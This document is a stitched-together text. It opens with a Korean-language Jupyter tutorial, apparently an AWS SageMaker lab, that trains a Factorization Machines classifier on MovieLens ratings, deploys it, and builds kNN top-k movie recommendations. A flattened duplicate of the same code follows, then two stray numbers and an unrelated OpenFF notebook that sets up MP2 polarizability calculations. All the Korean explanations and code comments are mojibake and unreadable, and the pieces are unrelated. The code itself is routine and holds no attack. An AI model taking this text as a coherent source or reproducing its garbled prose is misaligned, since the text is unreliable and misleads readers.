๋ํ, ๋ณธ ์์์์๋ rating์ด 4 ์ด์์ธ ์ํ๋ค์ ๋ํ ์ด์ง ๋ถ๋ฅ ๋ฌธ์ ๋ก ๊ฐ์ํํฉ๋๋ค. (์ฆ, rating์ด 4 ์ด์์ผ ๊ฒฝ์ฐ $y = 1$, 4 ๋ฏธ๋ง์ผ ๊ฒฝ์ฐ $y = 0$ ์
๋๋ค.)
์๋ ์
์ ์ฝ 20์ด ์์๋๋ฉฐ, ๋ณํ ํ ๋ฐ์ดํฐ์
์ ์ฐจ์์ rating ๊ฐ์ x ํผ์ณ ๊ฐ์ ์
๋๋ค.
```
%%time
def loadDataset(df, lines, columns):
# ํผ์ฒ๋ ์-ํซ ์ธ์ฝ๋ฉ ํฌ์ ํ๋ ฌ๋ก ๋ณํํฉ๋๋ค.
X = lil_matrix((lines, columns)).astype('float32')
Y = []
line = 0
for line, (index, row) in enumerate(df.iterrows()):
X[line,row['user_id']-1] = 1
X[line, nb_users+(row['movie_id']-1)] = 1
if int(row['rating']) >= 4:
Y.append(1)
else:
Y.append(0)
Y = np.array(Y).astype('float32')
return X,Y
X_train, Y_train = loadDataset(user_movie_ratings_train, nb_ratings_train, nb_features)
X_test, Y_test = loadDataset(user_movie_ratings_test, nb_ratings_test, nb_features)
print(X_train.shape)
print(Y_train.shape)
assert X_train.shape == (nb_ratings_train, nb_features)
assert Y_train.shape == (nb_ratings_train, )
zero_labels = np.count_nonzero(Y_train)
print("Training labels: {} zeros, {} ones".format(zero_labels, nb_ratings_train-zero_labels))
print(X_test.shape)
print(Y_test.shape)
assert X_test.shape == (nb_ratings_test, nb_features)
assert Y_test.shape == (nb_ratings_test, )
zero_labels = np.count_nonzero(Y_test)
print("Test labels: {} zeros, {} ones".format(zero_labels, nb_ratings_test-zero_labels))
```
### Protobuf ํฌ๋งท ๋ณํ ํ S3์ ์ ์ฅ
```
import sagemaker
bucket = sagemaker.Session().default_bucket()
#bucket = '[YOUR-BUCKET]'
prefix = 'fm-hol'
if bucket.strip() == '':
raise RuntimeError("bucket name is empty.")
train_key = 'train.protobuf'
train_prefix = '{}/{}'.format(prefix, 'train')
test_key = 'test.protobuf'
test_prefix = '{}/{}'.format(prefix, 'test')
output_prefix = 's3://{}/{}/output'.format(bucket, prefix)
```
์๋ ์
์ ์ฝ 15์ด ์์๋ฉ๋๋ค.
```
%%time
def writeDatasetToProtobuf(X, bucket, prefix, key, d_type, Y=None):
buf = io.BytesIO()
if d_type == "sparse":
smac.write_spmatrix_to_sparse_tensor(buf, X, labels=Y)
else:
smac.write_numpy_to_dense_tensor(buf, X, labels=Y)
buf.seek(0)
obj = '{}/{}'.format(prefix, key)
boto3.resource('s3').Bucket(bucket).Object(obj).upload_fileobj(buf)
return 's3://{}/{}'.format(bucket,obj)
fm_train_data_path = writeDatasetToProtobuf(X_train, bucket, train_prefix, train_key, "sparse", Y_train)
fm_test_data_path = writeDatasetToProtobuf(X_test, bucket, test_prefix, test_key, "sparse", Y_test)
print("Training data S3 path: ", fm_train_data_path)
print("Test data S3 path: ", fm_test_data_path)
print("FM model output S3 path: ", output_prefix)
```
### ํ๋ จ
๋ณธ ํธ์ฆ์จ์ ํ์ดํผํ๋ผ๋ฉํฐ ํ๋ ์์ด ํด๋ฆฌ์คํฑํ ํ์ดํผํ๋ผ๋ฉํฐ๋ค์ ์ฌ์ฉํฉ๋๋ค.
- `feature_dim`: ํผ์ฒ ๊ฐ์๋ก ๋ณธ ํธ์ฆ์จ์์๋ 2,625์ผ๋ก ์ค์ ํด์ผ ํฉ๋๋ค.
- `mini_batch_size`: ๋ณธ ํธ์ฆ์จ์์๋ 1,000์ผ๋ก ์ค์ ํฉ๋๋ค.
- `num_factors`: latent factor ์ฐจ์์ผ๋ก ๋ณธ ํธ์ฆ์จ์์๋ 64์ฐจ์์ผ๋ก ์ค์ ํฉ๋๋ค.
- `epochs`: ๋ณธ ํธ์ฆ์จ์์๋ 100 ์ํญ์ผ๋ก ์ค์ ํฉ๋๋ค.
```
instance_type_training = 'ml.c4.xlarge'
fm = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "factorization-machines"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=output_prefix,
sagemaker_session=sagemaker.Session())
fm.set_hyperparameters(feature_dim=nb_features,
predictor_type='binary_classifier',
mini_batch_size=1000,
num_factors=64,
epochs=100)
```
์ด์ ํ๋ จ์ ์์ํ๊ธฐ ์ํ ๋ชจ๋ ์ค๋น๊ฐ ์๋ฃ๋์์ผ๋ฉฐ, ์ฌ๋ฌ๋ถ๊ป์๋ `fit()` ๋ฉ์๋๋ง ํธ์ถํ๋ฉด ๋ฉ๋๋ค. <br>
ํ๋ จ์ ์ฝ 4๋ถ์์ 5๋ถ์ด ์์๋๋ฉฐ(์์ ํ๋ จ์ ์์๋๋ ์๊ฐ์ ํจ์ฌ ์งง์ง๋ง, ํ๋ จ ์ธ์คํด์ค๋ฅผ ํ๋ก๋น์ ๋ํ๋ ์๊ฐ์ด ๊ณ ์ ์ ์ผ๋ก ์์๋ฉ๋๋ค), ๊ฒ์ฆ ๋ฐ์ดํฐ์
์ ๋ํ accuracy๋ ์ฝ 70%์ F1 ์ค์ฝ์ด๋ ์ฝ 0.73~0.74์
๋๋ค. (์๋ output ๋ฉ์ธ์ง ์ฐธ์กฐ)
```
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_accuracy', 0.6928950159066808)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_cross_entropy', 0.5799107152103493)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_f_1.000', 0.7331859222406486)
```
```
%%time
fm.fit({'train': fm_train_data_path, 'test': fm_test_data_path})
```
### ๋ฐฐํฌ
๋ฐฐํฌ ๋ํ, ๋งค์ฐ ๊ฐ๋จํ๊ฒ `deploy()` ๋ฉ์๋๋ก ์ํํ์ค ์ ์์ต๋๋ค. ๋ฐฐํฌ๋ ์ฝ 5๋ถ์์ 10๋ถ์ด ์์๋ฉ๋๋ค.
```
%%time
instance_type_inference = 'ml.m5.large'
fm_predictor = fm.deploy(instance_type=instance_type_inference, initial_instance_count=1)
def fm_serializer(data):
js = {'instances': []}
for row in data:
js['instances'].append({'features': row.tolist()})
#print js
return json.dumps(js)
fm_predictor.content_type = 'application/json'
fm_predictor.serializer = fm_serializer
fm_predictor.deserializer = json_deserializer
result = fm_predictor.predict(X_test[1000:1010].toarray())
print(result)
print (Y_test[1000:1010])
```
#### ์ง๊ธ๊น์ง ๊ธฐ๋ณธ์ ์ธ ์ฌ์ฉ๋ฒ์ ์์๋ณด์์ผ๋ฉฐ, ์ฌ๊ธฐ์์ ์ค์ต์ ์ข
๋ฃํ์
๋ ๋ฉ๋๋ค. ์ค์ต์ ์ผ์ฐ ๋๋ด์
จ๊ฑฐ๋, ์ข ๋ ๊น์ ๋ด์ฉ์ ์ํ์ ๋ค๋ฉด ์๋ ์
๋ค์ ์์ฐจ์ ์ผ๋ก ์คํํด ์ฃผ์ธ์. ####
#### [์ฃผ์] ์ค์๊ฐ ์์ธก์ ์ ๊ณตํ๊ธฐ ์ํด ์๋ํฌ์ธํธ๋ฅผ ๊ณ์ ์คํํ ํ์๊ฐ ์๋ ๊ฒฝ์ฐ, ๊ณผ๊ธ์ ๋ง๊ธฐ ์ํด ์๋ํฌ์ธํธ๋ฅผ ์ญ์ ํด ์ฃผ์ธ์. ####
<br>
## 3. (Optional) top-k ์ถ์ฒ์ ์ํ์ฌ FM ๋ชจ๋ธ์ ๋ชจ๋ธ ํ๋ผ๋ฉํฐ๋ฅผ ์ฌ์ฉํ์ฌ knn์ผ๋ก ํ๋ จ ๋ฐ ๋ฐฐํฌํ๊ธฐ
---
์ด์ SageMaker์ ๋ชจ๋ธ์ ์์ฑํ๊ณ ์ ์ฅ ํ์ผ๋ฏ๋ก ๋์ผํ FM ๋ชจ๋ธ์ ๋ค์ด๋ก๋ํ์ฌ KNN ๋ชจ๋ธ์ ๋ง๊ฒ ๋ค์ ํจํค์ง ํ ์ ์์ต๋๋ค.
### ๋ชจ๋ธ ์ํฐํฉํธ ๋ค์ด๋ก๋
```
#!pip install mxnet # ํ์ํ ๊ฒฝ์ฐ ์ฃผ์์ ํด์ ํ์ฌ mxnet์ ์ค์นํด ์ฃผ์ธ์
import mxnet as mx
model_file_name = "model.tar.gz"
model_full_path = fm.output_path + "/" + fm.latest_training_job.job_name + "/output/" + model_file_name
print("Model Path: ", model_full_path)
# FM ๋ชจ๋ธ ์ํฐํฉํธ(model.tar.gz) ๋ค์ด๋ก๋
os.system("aws s3 cp " + model_full_path+ " .")
# ๋ชจ๋ธ ์ํฐํฉํธ ์์ถ ํด์
os.system("tar xzvf " + model_file_name)
os.system("unzip -o model_algo-1")
os.system("mv symbol.json model-symbol.json")
os.system("mv params model-0000.params")
```
### ๋ชจ๋ธ ๋ฐ์ดํฐ ๋ถ๋ฆฌ
FM์์ ํ๋ จํ ํ๋ผ๋ฉํฐ ํํ ($w_{0}, \mathbf{w}, \mathbf{V}$)์ ๊ฐ์ ธ์ต๋๋ค.
```
# ๋ชจ๋ธ ์ถ์ถ
m = mx.module.Module.load('./model', 0, False, label_names=['out_label'])
V = m._arg_params['v'].asnumpy() # 2625 x 64
w = m._arg_params['w1_weight'].asnumpy() # 2625 x1
b = m._arg_params['w0_weight'].asnumpy() # 1
print(V.shape, w.shape, b.shape)
```
### ๋ฐ์ดํฐ์
์ฌ๊ฐ๊ณต
์ด์ FM ๋ชจ๋ธ์์ ์ถ์ถํ ๋ชจ๋ธ ํ๋ผ๋ฉํฐ๋ฅผ ๋ค์ ํจํค์งํ์ฌ k-NN ๋ชจ๋ธ์ ํ๋ จํ๊ธฐ ์ํ ์ค๋น๋ฅผ ์ํํด ๋ณด๊ฒ ์ต๋๋ค. W
์ด ํ๋ก์ธ์ค๋ ๋ ๊ฐ์ ๋ฐ์ดํฐ์
์ ์์ฑํฉ๋๋ค.
- Item latent ํ๋ ฌ: k-NN ๋ชจ๋ธ ํ์ต์ ์ฌ์ฉ; $a_i = concat(V, \; w)$
- User latent ํ๋ ฌ: ์ถ๋ก ์ ์ฌ์ฉ; $a_u = concat(V, \; 1)$
์ฐธ๊ณ ๋ก, ๋ณธ ํธ์ฆ์จ ์ฝ๋๋ user ๋ฐ item ID๊ฐ ์๋ ์๋๋ฆฌ์ค์๋ง ์ ์ฉ๋ฉ๋๋ค. ๊ทธ๋ฌ๋ ์ค์ ๋ฐ์ดํฐ์๋ ์ถ๊ฐ ๋ฉํ๋ฐ์ดํฐ(์: user์ ๊ฒฝ์ฐ ๋์ด, ์ฐํธ๋ฒํธ, ์ฑ๋ณ์ด ํฌํจ๋๊ณ ์ํ์ ๊ฒฝ์ฐ ์ํ ์ฅ๋ฅด, ์ฃผ์ ํค์๋)๋ค์ด ํฌํจ๋ ์ ์์ต๋๋ค. ์ด๋ฌํ ๊ฒฝ์ฐ์๋ ์๋ ๋ฐฉ๋ฒ์ผ๋ก user ๋ฐ item ๋ฒกํฐ๋ฅผ ์ถ์ถํ ์ ์์ต๋๋ค.
- item๊ณผ item feature๋ฅผ $x_i$๋ก ์ธ์ฝ๋ฉ ํ $\mathbf{V}, \mathbf{w}$์ ๋ด์ ; $a_i = concat(V^T \cdot x_i , \; w^T \cdot x_i)$
- user์ user feature๋ฅผ $x_u$๋ก ์ธ์ฝ๋ฉ ํ $\mathbf{V}$์ ๋ด์ ; $a_u = concat(V^T \cdot x_u, \; , 1)$
$a_i$๋ฅผ ์ฌ์ฉํ์ฌ k-NN ๋ชจ๋ธ์ ํ๋ จํ๊ณ $a_u$๋ฅผ ์ฌ์ฉํ์ฌ ์ถ๋ก ์ ์ํํ์๋ฉด ๋ฉ๋๋ค.
```
# item latent matrix - concat(V[i], w[i]).
knn_item_matrix = np.concatenate((V[nb_users:], w[nb_users:]), axis=1) # 1682 x 65
knn_train_label = np.arange(1,nb_movies+1) # [1, 2, 3, ..., 1681, 1682]
# user latent matrix - concat (V[u], 1)
ones = np.ones(nb_users).reshape((nb_users, 1)) # 943x1
knn_user_matrix = np.concatenate((V[:nb_users], ones), axis=1) # 943 x 65
```
### k-NN ๋ชจ๋ธ ํ๋ จ
k-NN ๋ชจ๋ธ์ ๊ธฐ๋ณธ index_type (faiss.Flat)์ ์ฌ์ฉํฉ๋๋ค. ๋๊ท๋ชจ ๋ฐ์ดํฐ์
์ ๊ฒฝ์ฐ ์๋๊ฐ ๋๋ ค์ง๊ธฐ์, ์ด๋ฐ ๊ฒฝ์ฐ ๋ ๋น ๋ฅธ ํ๋ จ์ ์ํด ๋ค๋ฅธ index_type ๋งค๊ฐ ๋ณ์๋ฅผ ์ฌ์ฉํ ์ ์์ต๋๋ค. index ์ ํ์ ๋ํ ์์ธํ ๋ด์ฉ์ k-NN ์ค๋ช
์๋ฅผ ์ฐธ์กฐํด ์ฃผ์ธ์.
```
print('KNN train features shape = ', knn_item_matrix.shape)
knn_prefix = 'knn'
knn_output_prefix = 's3://{}/{}/output'.format(bucket, knn_prefix)
knn_train_data_path = writeDatasetToProtobuf(knn_item_matrix, bucket, knn_prefix, train_key, "dense", knn_train_label)
print('Uploaded KNN train data: {}'.format(knn_train_data_path))
nb_recommendations = 100
knn = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "knn"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=knn_output_prefix,
sagemaker_session=sagemaker.Session())
knn.set_hyperparameters(feature_dim=knn_item_matrix.shape[1], k=nb_recommendations,
index_metric="INNER_PRODUCT", predictor_type='classifier', sample_size=200000)
fit_input = {'train': knn_train_data_path}
```
ํ๋ จ์ ์์ํฉ๋๋ค. ์๋ ์
์ ์ํ ์๊ฐ์ ์ฝ 4๋ถ์์ 5๋ถ์ด ์์๋ฉ๋๋ค.
```
%%time
knn.fit(fit_input)
knn_model_name = knn.latest_training_job.job_name
print("Created model: ", knn_model_name)
```
๋ฐฐ์น ์ถ๋ก ์์ ์ฐธ์กฐํ ์ ์๋๋ก ๋ชจ๋ธ์ ์์ฑํฉ๋๋ค.
```
# ๋ค์ ๋จ๊ณ์์ ๋ฐฐ์น ์ถ๋ก ์ค์ ์ฐธ์กฐํ ์ ์๋๋ก ๋ชจ๋ธ ์ ์ฅ
sm = boto3.client(service_name='sagemaker')
primary_container = {
'Image': knn.image_name,
'ModelDataUrl': knn.model_data,
}
knn_model = sm.create_model(
ModelName = knn.latest_training_job.job_name,
ExecutionRoleArn = knn.role,
PrimaryContainer = primary_container)
```
### Batch Transform
Amazon SageMaker์ Batch Transform ๊ธฐ๋ฅ์ ์ฌ์ฉํ๋ฉด ๋๊ท๋ชจ๋ก ๋ฐฐ์น ์ถ๋ก ๊ฒฐ๊ณผ๋ฅผ ์์ฑํ ์ ์์ต๋๋ค. <br>
์๋ ์
์ ์คํ์ด ์๋ฃ๋๊ธฐ๊น์ง๋ ์ฝ 4๋ถ ์์๋ฉ๋๋ค.
```
%%time
# ์ถ๋ก ๋ฐ์ดํฐ S3์ ์
๋ก๋
knn_batch_data_path = writeDatasetToProtobuf(knn_user_matrix, bucket, knn_prefix, train_key, "dense")
print("Batch inference data path: ", knn_batch_data_path)
# Transformer ๊ฐ์ฒด ์ด๊ธฐํ
transformer = sagemaker.transformer.Transformer(
base_transform_job_name="knn",
model_name=knn_model_name,
instance_count=1,
instance_type=instance_type_inference,
output_path=knn_output_prefix,
accept="application/jsonlines; verbose=true"
)
# ๋ณํ ์์
์์
transformer.transform(knn_batch_data_path, content_type='application/x-recordio-protobuf')
transformer.wait()
# S3์์ ์ถ๋ ฅ ํ์ผ ๋ค์ด๋ก๋
results_file_name = "inference_output"
inference_output_file = "knn/output/train.protobuf.out"
s3_client = boto3.client('s3')
s3_client.download_file(bucket, inference_output_file, results_file_name)
with open(results_file_name) as f:
results = f.readlines()
```
### top-k ์ถ๋ก ์์
๋ฐฐ์น ์ถ๋ก ๊ฒฐ๊ณผ์์ 90๋ฒ ์ฌ์ฉ์์ ์ถ์ฒ ์ํ๋ฅผ ํ์ธํด ๋ณด๊ฒ ์ต๋๋ค. ๊ฒฐ๊ณผ ๋ฐ์ดํฐํ๋ ์์ 1๋ฒ์งธ ํ์ ์ํ id, 2๋ฒ์งธ ํ์ ์ํ ์ ๋ชฉ, 3๋ฒ์งธ ํ์
์ ์ฌ๋์
๋๋ค.
```
def get_movie_title(movie_id):
movie_id = int(movie_id)
return items.iloc[movie_id]['TITLE']
import json
test_user_idx = 89 # ์ธ๋ฑ์ค๋ 0๋ถํฐ ์์ํ๋ฏ๋ก 90๋ฒ ์ฌ์ฉ์์ ์ธ๋ฑ์ค๋ 89์
๋๋ค.
u_one_json = json.loads(results[test_user_idx])
items = pd.read_csv('./ml-100k/u.item', sep='|', usecols=[0,1], encoding='latin-1', names=['ITEM_ID', 'TITLE'], index_col='ITEM_ID')
movie_id_list = [int(movie_id) for movie_id in u_one_json['labels']]
movie_dist_list = [round(distance, 4) for distance in u_one_json['distances']]
movie_title_list = [get_movie_title(movie_id) for movie_id in movie_id_list]
recommend_df = pd.DataFrame({'movie_id': movie_id_list,
'movie_title': movie_title_list,
'movie_dist': movie_dist_list})
print("Recommendations for user: ", test_user_idx)
recommend_df.head(30)
```
|
github_jupyter
|
import sagemaker
import sagemaker.amazon.common as smac
from sagemaker import get_execution_role
from sagemaker.predictor import json_deserializer
from sagemaker.amazon.amazon_estimator import get_image_uri
import numpy as np
from scipy.sparse import lil_matrix
import pandas as pd
import boto3, io, os, csv, json
!wget http://files.grouplens.org/datasets/movielens/ml-100k.zip
!unzip -o ml-100k.zip
!shuf ml-100k/ua.base -o ml-100k/ua.base.shuffled
user_movie_ratings_train = pd.read_csv('ml-100k/ua.base.shuffled', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_train.head(5)
user_movie_ratings_test = pd.read_csv('ml-100k/ua.test', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_test.head(5)
nb_users = user_movie_ratings_train['user_id'].max()
nb_movies = user_movie_ratings_train['movie_id'].max()
nb_features = nb_users + nb_movies
total_ratings = nb_users * nb_movies
nb_ratings_test = len(user_movie_ratings_test.index)
nb_ratings_train = len(user_movie_ratings_train.index)
print("# of users: {}".format(nb_users))
print("# of movies: {}".format(nb_movies))
print("Training Count: {}".format(nb_ratings_train))
print("Test Count: {}".format(nb_ratings_test))
print("Features (# of users + # of movies): {}".format(nb_features))
print("Sparsity: {}%".format(((nb_ratings_test+nb_ratings_train)/total_ratings)*100))
%%time
def loadDataset(df, lines, columns):
# ํผ์ฒ๋ ์-ํซ ์ธ์ฝ๋ฉ ํฌ์ ํ๋ ฌ๋ก ๋ณํํฉ๋๋ค.
X = lil_matrix((lines, columns)).astype('float32')
Y = []
line = 0
for line, (index, row) in enumerate(df.iterrows()):
X[line,row['user_id']-1] = 1
X[line, nb_users+(row['movie_id']-1)] = 1
if int(row['rating']) >= 4:
Y.append(1)
else:
Y.append(0)
Y = np.array(Y).astype('float32')
return X,Y
X_train, Y_train = loadDataset(user_movie_ratings_train, nb_ratings_train, nb_features)
X_test, Y_test = loadDataset(user_movie_ratings_test, nb_ratings_test, nb_features)
print(X_train.shape)
print(Y_train.shape)
assert X_train.shape == (nb_ratings_train, nb_features)
assert Y_train.shape == (nb_ratings_train, )
zero_labels = np.count_nonzero(Y_train)
print("Training labels: {} zeros, {} ones".format(zero_labels, nb_ratings_train-zero_labels))
print(X_test.shape)
print(Y_test.shape)
assert X_test.shape == (nb_ratings_test, nb_features)
assert Y_test.shape == (nb_ratings_test, )
zero_labels = np.count_nonzero(Y_test)
print("Test labels: {} zeros, {} ones".format(zero_labels, nb_ratings_test-zero_labels))
import sagemaker
bucket = sagemaker.Session().default_bucket()
#bucket = '[YOUR-BUCKET]'
prefix = 'fm-hol'
if bucket.strip() == '':
raise RuntimeError("bucket name is empty.")
train_key = 'train.protobuf'
train_prefix = '{}/{}'.format(prefix, 'train')
test_key = 'test.protobuf'
test_prefix = '{}/{}'.format(prefix, 'test')
output_prefix = 's3://{}/{}/output'.format(bucket, prefix)
%%time
def writeDatasetToProtobuf(X, bucket, prefix, key, d_type, Y=None):
buf = io.BytesIO()
if d_type == "sparse":
smac.write_spmatrix_to_sparse_tensor(buf, X, labels=Y)
else:
smac.write_numpy_to_dense_tensor(buf, X, labels=Y)
buf.seek(0)
obj = '{}/{}'.format(prefix, key)
boto3.resource('s3').Bucket(bucket).Object(obj).upload_fileobj(buf)
return 's3://{}/{}'.format(bucket,obj)
fm_train_data_path = writeDatasetToProtobuf(X_train, bucket, train_prefix, train_key, "sparse", Y_train)
fm_test_data_path = writeDatasetToProtobuf(X_test, bucket, test_prefix, test_key, "sparse", Y_test)
print("Training data S3 path: ", fm_train_data_path)
print("Test data S3 path: ", fm_test_data_path)
print("FM model output S3 path: ", output_prefix)
instance_type_training = 'ml.c4.xlarge'
fm = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "factorization-machines"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=output_prefix,
sagemaker_session=sagemaker.Session())
fm.set_hyperparameters(feature_dim=nb_features,
predictor_type='binary_classifier',
mini_batch_size=1000,
num_factors=64,
epochs=100)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_accuracy', 0.6928950159066808)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_cross_entropy', 0.5799107152103493)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_f_1.000', 0.7331859222406486)
%%time
fm.fit({'train': fm_train_data_path, 'test': fm_test_data_path})
%%time
instance_type_inference = 'ml.m5.large'
fm_predictor = fm.deploy(instance_type=instance_type_inference, initial_instance_count=1)
def fm_serializer(data):
js = {'instances': []}
for row in data:
js['instances'].append({'features': row.tolist()})
#print js
return json.dumps(js)
fm_predictor.content_type = 'application/json'
fm_predictor.serializer = fm_serializer
fm_predictor.deserializer = json_deserializer
result = fm_predictor.predict(X_test[1000:1010].toarray())
print(result)
print (Y_test[1000:1010])
#!pip install mxnet # ํ์ํ ๊ฒฝ์ฐ ์ฃผ์์ ํด์ ํ์ฌ mxnet์ ์ค์นํด ์ฃผ์ธ์
import mxnet as mx
model_file_name = "model.tar.gz"
model_full_path = fm.output_path + "/" + fm.latest_training_job.job_name + "/output/" + model_file_name
print("Model Path: ", model_full_path)
# FM ๋ชจ๋ธ ์ํฐํฉํธ(model.tar.gz) ๋ค์ด๋ก๋
os.system("aws s3 cp " + model_full_path+ " .")
# ๋ชจ๋ธ ์ํฐํฉํธ ์์ถ ํด์
os.system("tar xzvf " + model_file_name)
os.system("unzip -o model_algo-1")
os.system("mv symbol.json model-symbol.json")
os.system("mv params model-0000.params")
# ๋ชจ๋ธ ์ถ์ถ
m = mx.module.Module.load('./model', 0, False, label_names=['out_label'])
V = m._arg_params['v'].asnumpy() # 2625 x 64
w = m._arg_params['w1_weight'].asnumpy() # 2625 x1
b = m._arg_params['w0_weight'].asnumpy() # 1
print(V.shape, w.shape, b.shape)
# item latent matrix - concat(V[i], w[i]).
knn_item_matrix = np.concatenate((V[nb_users:], w[nb_users:]), axis=1) # 1682 x 65
knn_train_label = np.arange(1,nb_movies+1) # [1, 2, 3, ..., 1681, 1682]
# user latent matrix - concat (V[u], 1)
ones = np.ones(nb_users).reshape((nb_users, 1)) # 943x1
knn_user_matrix = np.concatenate((V[:nb_users], ones), axis=1) # 943 x 65
print('KNN train features shape = ', knn_item_matrix.shape)
knn_prefix = 'knn'
knn_output_prefix = 's3://{}/{}/output'.format(bucket, knn_prefix)
knn_train_data_path = writeDatasetToProtobuf(knn_item_matrix, bucket, knn_prefix, train_key, "dense", knn_train_label)
print('Uploaded KNN train data: {}'.format(knn_train_data_path))
nb_recommendations = 100
knn = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "knn"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=knn_output_prefix,
sagemaker_session=sagemaker.Session())
knn.set_hyperparameters(feature_dim=knn_item_matrix.shape[1], k=nb_recommendations,
index_metric="INNER_PRODUCT", predictor_type='classifier', sample_size=200000)
fit_input = {'train': knn_train_data_path}
%%time
knn.fit(fit_input)
knn_model_name = knn.latest_training_job.job_name
print("Created model: ", knn_model_name)
# ๋ค์ ๋จ๊ณ์์ ๋ฐฐ์น ์ถ๋ก ์ค์ ์ฐธ์กฐํ ์ ์๋๋ก ๋ชจ๋ธ ์ ์ฅ
sm = boto3.client(service_name='sagemaker')
primary_container = {
'Image': knn.image_name,
'ModelDataUrl': knn.model_data,
}
knn_model = sm.create_model(
ModelName = knn.latest_training_job.job_name,
ExecutionRoleArn = knn.role,
PrimaryContainer = primary_container)
%%time
# ์ถ๋ก ๋ฐ์ดํฐ S3์ ์
๋ก๋
knn_batch_data_path = writeDatasetToProtobuf(knn_user_matrix, bucket, knn_prefix, train_key, "dense")
print("Batch inference data path: ", knn_batch_data_path)
# Transformer ๊ฐ์ฒด ์ด๊ธฐํ
transformer = sagemaker.transformer.Transformer(
base_transform_job_name="knn",
model_name=knn_model_name,
instance_count=1,
instance_type=instance_type_inference,
output_path=knn_output_prefix,
accept="application/jsonlines; verbose=true"
)
# ๋ณํ ์์
์์
transformer.transform(knn_batch_data_path, content_type='application/x-recordio-protobuf')
transformer.wait()
# S3์์ ์ถ๋ ฅ ํ์ผ ๋ค์ด๋ก๋
results_file_name = "inference_output"
inference_output_file = "knn/output/train.protobuf.out"
s3_client = boto3.client('s3')
s3_client.download_file(bucket, inference_output_file, results_file_name)
with open(results_file_name) as f:
results = f.readlines()
def get_movie_title(movie_id):
movie_id = int(movie_id)
return items.iloc[movie_id]['TITLE']
import json
test_user_idx = 89 # ์ธ๋ฑ์ค๋ 0๋ถํฐ ์์ํ๋ฏ๋ก 90๋ฒ ์ฌ์ฉ์์ ์ธ๋ฑ์ค๋ 89์
๋๋ค.
u_one_json = json.loads(results[test_user_idx])
items = pd.read_csv('./ml-100k/u.item', sep='|', usecols=[0,1], encoding='latin-1', names=['ITEM_ID', 'TITLE'], index_col='ITEM_ID')
movie_id_list = [int(movie_id) for movie_id in u_one_json['labels']]
movie_dist_list = [round(distance, 4) for distance in u_one_json['distances']]
movie_title_list = [get_movie_title(movie_id) for movie_id in movie_id_list]
recommend_df = pd.DataFrame({'movie_id': movie_id_list,
'movie_title': movie_title_list,
'movie_dist': movie_dist_list})
print("Recommendations for user: ", test_user_idx)
recommend_df.head(30)
| 0.211824 | 0.815967 |
```
import logging
import warnings
from pprint import pprint
import numpy as np
from openeye import oechem
from openff.qcsubmit.common_structures import QCSpec, PCMSettings
from openff.qcsubmit.factories import OptimizationDatasetFactory
from openff.qcsubmit.workflow_components import StandardConformerGenerator
from openff.toolkit.topology import Molecule
from qcelemental.models.results import WavefunctionProtocolEnum
from tqdm import tqdm
from openff.toolkit.utils import GLOBAL_TOOLKIT_REGISTRY, OpenEyeToolkitWrapper
GLOBAL_TOOLKIT_REGISTRY.deregister_toolkit(OpenEyeToolkitWrapper)
# Warnings that tell us we have undefined stereo and charged molecules
logging.getLogger("openff.toolkit").setLevel(logging.ERROR)
warnings.simplefilter("ignore")
```
# Dataset Preperation
Load in the SMILES patterns of the molecules to include:
```
with open("molecules.smi") as file:
smiles_patterns = file.read().split("\n")
smiles_patterns = [pattern for pattern in smiles_patterns if len(pattern) > 0]
```
Load in the molecules to be optimized:
```
molecules = [
Molecule.from_smiles(s)
for s in tqdm(smiles_patterns)
]
print(len(molecules))
```
Prepare the main dataset from the molecule list.
```
# Required due to occasional SCF failures. See the V1 dataset as well as
# http://forum.psicode.org/t/dft-scf-not-converging/1725/3
# dft_ultra_fine_keywords = dict(
# dft_spherical_points=590,
# dft_radial_points=99,
# dft_pruning_scheme="robust"
# )
external_field = {
"X-": [-0.01, 0.0, 0.0],
"X+": [0.01, 0.0, 0.0],
"Y-": [0.0, -0.01, 0.0],
"Y+": [0.0, 0.01, 0.0],
"Z-": [0.0, 0.0, -0.01],
"Z+": [0.0, 0.0, 0.01],
}
qc_specifications = {}
for key, value in external_field.items():
qc_specifications[f"MP2/aug-cc-pVTZ/{key}"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name=f"MP2/aug-cc-pVTZ/{key}",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
keywords= {
"scf_type": "df",
"mp2_type": "df",
"E_CONVERGENCE": "1.0e-8",
"PERTURB_H": True,
"PERTURB_WITH": "DIPOLE",
"PERTURB_DIPOLE": value, # ["X-", "X+", "Y-", "Y+", "Z-", "Z+"]
},
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
qc_specifications["MP2/aug-cc-pVTZ"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name="MP2/aug-cc-pVTZ",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
dataset_factory = OptimizationDatasetFactory(
qc_specifications=qc_specifications
)
dataset_factory.add_workflow_components(
StandardConformerGenerator(max_conformers=5, rms_cutoff=0.1, clear_existing=True)
)
dataset = dataset_factory.create_dataset(
dataset_name="OpenFF RESP Polarizability Optimizations v1.1",
tagline="Optimizations of ESP-fitting based direct polarizabilities.",
description="A data set used for training typed polarizabilities using direct polarization.\n"
"This data set only includes element C, H, N, and O.",
molecules=molecules,
)
dataset.metadata.submitter = "willawang"
